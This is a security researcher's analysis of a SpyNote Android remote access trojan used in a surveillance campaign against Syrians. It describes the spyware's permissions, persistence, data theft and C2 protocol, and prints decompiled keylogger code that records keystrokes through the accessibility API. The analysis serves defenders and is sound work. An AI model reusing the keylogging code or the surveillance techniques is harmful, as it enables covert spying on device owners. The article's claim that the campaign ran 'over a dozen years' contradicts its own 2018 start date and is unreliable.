An in-depth analysis of SpyNote remote access trojan
By Bartłomiej Czyż
Published: 2020-07-15 · Archived: 2026-04-06 01:30:25 UTC
Lookout researchers have recently discovered a surveillance campaign targeting Syrian citizens and it is believed that the
actor behind the attack was state-sponsored. The campaign had been active since January 2018 and its goal was to infect
Android mobile devices with remote access trojans (RATs) and then spy on people in possession of those devices. 
The victims were tricked into downloading and installing innocent-looking mobile applications which were actually
spyware. The applications were shared through various communication channels; however, they were never available on the
official Google Play Store. Some applications attempted to masquerade as legitimate ones like Telegram, others were
COVID-19 contact tracing apps or benign tools like a fake digital thermometer, and others impersonated Android built-in
tools. The common factor was that all of them had an additional functionality: allowing the adversary to spy on the users
who installed them.
In this article we will examine the internal workings of one of those applications to analyze its capabilities and understand
how it is used by the threat actors.
What is a remote access trojan (RAT)?
A Remote Access Trojan (RAT) is a type of malware that controls a system through a remote network connection. A RAT is
typically installed without the victim's knowledge, often as payload of a trojan horse program, and will try to hide its
operation from the victim and from security software and other anti-virus software.
A RAT enables its operators to perform many activities on the compromised device (e.g. control a device's camera, access its
storage, intercept calls and text messages, etc.). This is all done via an easy-to-use application hosted on a command and
control server.
Executive summary 
A sample Android application was chosen for analysis from a pool of 71 malicious ones reported by Lookout’s research. The
sample examined is an instance of the SpyNote RAT.
Chosen application details:
After the application is installed, it is displayed as Android with the icon resembling the one of the built-in Android
applications Settings .
https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan
Page 1 of 12

Malware icon
AndroidManifest.xml file reveals that malware takes advantage of a number of permissions, allowing it to have, among
others, the following capabilities:
track location of the device (GPS and network-based)
make and intercept calls
access camera
access external storage
access contact list
read SMS
access microphone
displaying content over other applications
clickjacking via Accessibility Services
Technical details 
While the distribution channel for the application sample remains unknown, it was surely never available on the official
Google Play Store. Most likely, the malware was spread via other means like a spearphishing attachment or a link.
A SpyNote client can masquerade as legitimate application. Static code analysis indicates that the malware, after successful
installation, would install a legitimate application embedded in the APK file at res/raw/google.apk . Also, screenshots of
cracked SpyNote server v6.4.4 proves that functionality:
https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan
Page 2 of 12

APK builder
The adversary can pick a name of the application, service, its version, and the name of a victim to be able to differentiate
them. This value can be extracted from the res/values/strings.xml file. In this particular example they were set as follows:
<string name="n">Hamody</string> <!-- Victim Name -->
<string name="app_name">Android</string> <!-- App Name -->
<string name="s">Android</string> <!-- Service Name -->
<string name="v">6.4.4</string> <!-- Version -->
This sample did not include any additional applications and the file res/raw/google.apk was empty.
google.apk file details
It was left was so that the malware, when executed, simply loads the legitimate
android.settings.ACCESSIBILITY_SETTINGS intent:
https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan
Page 3 of 12

Accessibility intent
Code running accessibility intent
Android applications, including malware, can listen for the BOOT_COMPLETED broadcast event to ensure the application
will be activated upon device start up, and this is the technique that SpyNote utilizes to achieve its persistence mechanism.
As per the AndroidManifest.xml file, the class that is receiving the BOOT_COMPLETED event is com.android.tester.C4 :
This class waits for the BOOT_COMPLETED broadcast, checks if the com.android.tester.C11 service is already running,
and, if not, initiates it. The service is responsible for processing commands received from the C2 server and is also the class
where most of the code resides.
https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan
Page 4 of 12

com.android.tester.C4 class code
SpyNote is able to discover installed applications, so that the attackers can tell which security appliances are deployed to a
device. A reason for collection of the list of applications may be to discover high value applications like banking or
messaging software. Application discovery is achieved by using the PackageManager class:
Application discovery code
The above code not only extracts names of the installed applications, but also their installation dates and icons. This is what
the operators controlling the device see:
List of
extracted applications
https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan
Page 5 of 12

There is a large quantity of other data that malware extracts, most likely for the operators to be able to easily tell that it is
running in a virtual machine. The following are main information categories that the adversary takes advantage of:
device
system
SIM
WiFi
audio
Bluetooth
location
For most Android Virtual Devices (AVDs), the data above will not vary too much by default and it is more than enough
information to determine whether the infected system is a real mobile device or an emulator. 
Extracted device information
It can also be seen on the footage that the tool embedded in SpyNote's C2 can be used to generate APKs. It is highly
customizable and allows the attacker to choose whether the application should be hidden or not. Other possibilities include
enabling key logging, device administration, leveraging SuperSU if the device is rooted, and deactivating icons.
SpyNote APK builder
SpyNote operators can use Device Administrator access to wipe data, lock it, or reset the password:
https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan
Page 6 of 12

Device Administrator actions
SpyNote makes use of the accessibility API by overriding onAccessibilityEvent method to log keystrokes. The logs are
saved to external storage to file configdd-MM-yyy.log where dd-MM-yyyy is the date of when the keystrokes were
captured. The data can then be downloaded by the malware operators.
public void onAccessibilityEvent(AccessibilityEvent accessibilityEvent) {
 try {
 String a = m1819a(accessibilityEvent); // accessibilityEvent.getText().toString();
 String str = (String) accessibilityEvent.getPackageName();
 StringBuilder sb = new StringBuilder();
 if (a.startsWith("[") && a.endsWith("]")) {
 a = a.substring(1, a.length() - 1);
 }
 if (!this.f1163b.equals(a)) {
 this.f1163b = a;
 if (str != null && a.length() != 0) {
 String format = new SimpleDateFormat("HH:mm a", Locale.ENGLISH).format(new Date());
 String str2 = new String("-1");
 if (getApplicationContext().getResources().getString(R.string.gp).charAt(2) == '0') {
 // redacted application icon extraction
 }
 if (str != null && a != null && format != null) {
 if (C11.f1164A) {
 C11.m1858a(C11.m1851a(C11.f1181m, 50) + C11.f1175f + C11.m1851a(C11.f1181m, 115) + C11.f1175f
 }
 sb.append(str2 + C11.f1177h + a + C11.f1177h + str + C11.f1177h + format + C11.f1176g);
 String string2 = getApplicationContext().getResources().getString(R.string.s);
 if ("mounted".equals(Environment.getExternalStorageState())) {
 File file = new File(Environment.getExternalStorageDirectory().getAbsolutePath() + "/" + strin
 if (!file.exists()) {
 file.mkdirs();
 }
 try {
 String format = new SimpleDateFormat("dd-MM-yyyy", Locale.ENGLISH).format(new Date());
 String string = getApplicationContext().getResources().getString(R.string.s);
 File file = new File(Environment.getExternalStorageDirectory().getAbsolutePath() + "/" + s
 if (file.exists()) {
 FileWriter fileWriter = new FileWriter(file.getPath() + "/config" + format + ".log", t
 fileWriter.write(sb.toString());
 fileWriter.close();
 }
 } catch (IOException unused) {
 }
 }
 }
 }
 }
 } catch (Exception unused) {
 }
 }
https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan
Page 7 of 12

The spyware has a File Manager feature allowing access to files like application data, pictures, downloads, and others, that
are kept in the external storage:
File Manager feature code
File
Manager as seen by the attackers
SpyNote has a location tracking feature based on GPS and network data. The location data is obtained by registering
LocationListener using requestLocationUpdates method from LocationManager class.
Moreover, a remote command can be issued to capture audio or camera feed. The code is designed to allow live footage to
be obtained from all cameras available on a device with additional capabilities like zoom, flash etc.
https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan
Page 8 of 12

Audio
recording code
The collected data exfiltration is achieved over the command and control channel. All commands and data are sent via the
normal communications channel. All traffic sent by a victim's device is compressed before being sent using
java.util.zip.GZIPOutputStream class:
Data
compression code
Command and control (C2, C&C) traffic is sent over an uncommonly used port tcp/215, but it is also possible for SpyNote
to communicate via any other TCP port. The IP address and port are chosen during the APK building process:
C2 server configuration
SpyNote uses a custom TCP protocol for C&C communications:
https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan
Page 9 of 12

SpyNote
protocol visualization
The traffic always starts with the payload size followed by a 0x00 null byte. The payload from a victim to the C2 server is
always GZIP DEFLATE-compressed and, thus, starts with 0x1f8b08 bytes.
The above payload was the initial one sent to the C2 and can be easily decompressed:
$ echo
"1f8b0800000000000000ad56c9d6ab380e7e957f559b2c98032c0d98314098033b8600614e026178fa22b953dfdb7d4ed7a2744e6c7db29065497684a13845
| xxd -r -p | zcat
1025310249null10249100&false10249w410249510249null &
null10249/9j/4AAQSkZJRgABAQAAAQABAAD/4gIoSUNDX1BST0ZJTEUAAQEAAAIYAAAAAAIQAABtbnRyUkdCIFhZWiAAAAAAAAAAAA
Android SDK built for x861024910 & 2910249f60598b565b235cd102491024910248null
The above base64 string is an encoded JPG file containing a part of the device's screen:
Extracted part of the device screen
After the initial payload is sent to the C2 server, the beaconing activity between the device and the C&C server begins:
Beaconing
traffic
The server sends 35 00 70 6f 69 6e 67 which is similar to the described protocol above:
0x35 - payload size (5 ASCII)
0x00 - null byte
0x706f696e67 - poing in ASCII
https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan
Page 10 of 12

The victim responds with:
 0x3333001f8b08000000000000002b28cd2d30343032b1c82bcdc901007d342eed0d000000
0x3333 - payload size (33 ASCII)
0x00 - null byte
0x1f8b08000000000000002b28cd2d30343032b1c82bcdc901007d342eed0d000000 - GZIP compressed string
pump10248null
Conclusion
Analysis of the SpyNote sample indicates that the threat actors behind the surveillance campaign had extensive control over
victims' devices. Not only does this piece of malware have considerable features, but it is also highly customizable to evade
detection and deceive victims into downloading, installing, and providing full access to their devices. Having that in mind, it
should not be surprising that the adversary was able to run the campaign for over a dozen years. It is also clear that users
should be educated not to install mobile applications from non-official application stores. Moreover, Device Administrator
privilege should only be granted to, if any, trusted applications.
Detection
Indicators of compromise (IOCs)
MITRE ATT&CK Techniques
https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan
Page 11 of 12

Source: https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan
https://bulldogjob.pl/articles/1200-an-in-depth-analysis-of-spynote-remote-access-trojan
Page 12 of 12